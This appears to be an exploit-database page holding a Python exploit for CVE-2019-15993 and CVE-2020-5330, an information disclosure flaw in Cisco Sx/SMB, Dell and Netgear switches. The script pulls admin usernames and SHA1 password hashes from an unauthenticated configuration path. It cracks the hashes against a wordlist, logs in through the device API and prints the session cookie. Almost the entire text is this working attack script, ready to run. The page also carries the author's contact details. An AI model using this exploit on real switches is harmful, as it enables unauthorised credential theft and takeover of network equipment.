扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 |
# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 andCisco Sx / SMB - Information Disclosure # DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability> https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos # CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter # Discovered by Ken 's1ngular1ty' Pyle # CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter # Discovered by Ken 's1ngular1ty' Pyle import requests import re import hashlib import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning if len(sys.argv) < 3: print("Usage: python cve-2019-15993.py URL passwordfile") sys.exit() url = sys.argv[1] file = sys.argv[2] requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def hash_value(value): """Calculate the SHA1 hash of a value.""" sha1 = hashlib.sha1() sha1.update(value.encode('utf-8')) return sha1.hexdigest() def userName_parser(text, start_delimiter, end_delimiter): results = [] iteration = 0 start = 0 while start >= 0: start = text.find(start_delimiter, start) if start >= 0: start += len(start_delimiter) end = text.find(end_delimiter, start) if end >= 0: results.append(text[start:end]) start = end + len(end_delimiter) iteration = iteration + 1 return results # retrieve the web page response = requests.get(url, allow_redirects=False, verify=False) # Read in the values from the file with open(file, 'r') as f: values = f.readlines() values = [value.strip() for value in values] hashes = {hash_value(value): value for value in values} if response.status_code == 302: print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n") url = response.headers["Location"] + "config/device/adminusersetting" response=requests.get(url, verify=False) if response.status_code == 200: print("[*] Successful request to URL:", url + "\n") content = response.text users_names = userName_parser(content,"<userName>","</userName>") sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content) print("SHA1 Hashes found:\n") loops = 0 while loops < len(sha1_hashes): print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n") for sha1_hash in sha1_hashes: if sha1_hash in hashes: print("Match:", sha1_hash, hashes[sha1_hash]) print("\nTesting Credentials via API.\n\n") payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash]) response_login = requests.get(payload, allow_redirects=False, verify=False) headers = response_login.headers if "sessionID" in headers: print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n") print(headers["sessionID"]) else: print("Unable to sign in.") loops = loops + 1 else: print("Host is not vulnerable:", response.status_code) [cid:2b37ad37-9b26-416d-b485-c88954c0ab53] Ken Pyle M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+ Main: 267-540-3337 Direct: 484-498-8340 Email: kp@cybir.com Website: www.cybir.com |
体验盒子
